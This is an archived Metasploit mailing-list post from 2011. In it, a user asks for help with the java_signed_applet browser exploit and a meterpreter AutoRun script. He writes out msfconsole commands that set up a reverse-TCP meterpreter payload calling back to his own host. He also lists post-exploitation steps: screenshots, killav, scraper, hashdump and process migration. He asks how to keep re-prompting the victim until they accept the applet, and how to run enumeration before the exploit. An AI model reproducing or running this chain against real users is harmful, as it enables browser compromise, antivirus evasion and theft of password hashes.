Metasploit mailing list archives
Re: HELP: metasploit v3.8.0-dev (Java UNsigned Applet) and meterpreter AutoRun scripts.
From: Richard Miles <richard.k.miles () googlemail com>
Date: Sun, 19 Jun 2011 11:26:39 -0500
No one can help me? Thanks On Thu, Jun 16, 2011 at 4:18 PM, Richard Miles <richard.k.miles () googlemail com> wrote:
Hi 1) I want to test the Java Signed Applet, I'm using version metasploit v3.8.0-dev, I'm following this tutorial: https:/community.rapid7.com/community/metasploit/blog/2011/05/26/recent-developments-in-java-signed-applets It works, however I still get it with bad digital signature. Below is how I'm executing it: use exploit/multi/browser/java_signed_applet set PAYLOAD windows/meterpreter/reverse_tcp_allports set AutoRunScript multiscript -s /root/script.rc set LHOST MyIP set APPLETNAME CompanyName set CERTCN Santo CompanyName set SRVPORT 80 set ExitOnSession false exploit -j -z And it works, but I always see on the browser as an unsigned (bad digital signature). What I'm doing wrong? b) Also, on my script.rc I have: screenshot sysinfo getuid run killav run scraper run getprivs getprivs run hashdump dir c:\ ps migrate migrate -f screenshot But on the output of msfconsole I just see: meterpreter > run multi_console_command -s /root/dump.rc [*] Running Command List ... meterpreter > And I never see the output. I basically just want to do the following once a connection with meterpreter is estabilished. - get a screenshot - get sysinfo and getuid - run killav and scraper - launch getpriv - execute hashdump - execute "dir c:\" and "ps". - call migrate -f (create an notepad and migrate to it) - sleep 45 seconds and get another screenshot. Can someone help me how to do it? I want to see all output on the msfconsole or save locally on the msfconsole machine. How? C) There is a way to tell metasploit to reload Java Signed Applet exploit until user click "yes"? D) I would love to have an .php script doing basic enumeration of my target before execute Java Signed Applet, there is a way to launch this exploit in Apache or any other way that I can first execute an .php scrip and then redirect to the Java Signed Applet exploit? Thanks a lot.
_______________________________________________ https://mail.metasploit.com/mailman/listinfo/framework
Current thread:
- HELP: metasploit v3.8.0-dev (Java UNsigned Applet) and meterpreter AutoRun scripts. Richard Miles (Jun 16)
- Re: HELP: metasploit v3.8.0-dev (Java UNsigned Applet) and meterpreter AutoRun scripts. Richard Miles (Jun 19)
- Re: HELP: metasploit v3.8.0-dev (Java UNsigned Applet) and meterpreter AutoRun scripts. jambunathan sadasivamiyer (Jun 19)
- Re: HELP: metasploit v3.8.0-dev (Java UNsigned Applet) and meterpreter AutoRun scripts. Carlos Perez (Jun 19)
- Re: HELP: metasploit v3.8.0-dev (Java UNsigned Applet) and meterpreter AutoRun scripts. Richard Miles (Jun 20)
- Re: HELP: metasploit v3.8.0-dev (Java UNsigned Applet) and meterpreter AutoRun scripts. jambunathan sadasivamiyer (Jun 19)
- Re: HELP: metasploit v3.8.0-dev (Java UNsigned Applet) and meterpreter AutoRun scripts. Richard Miles (Jun 19)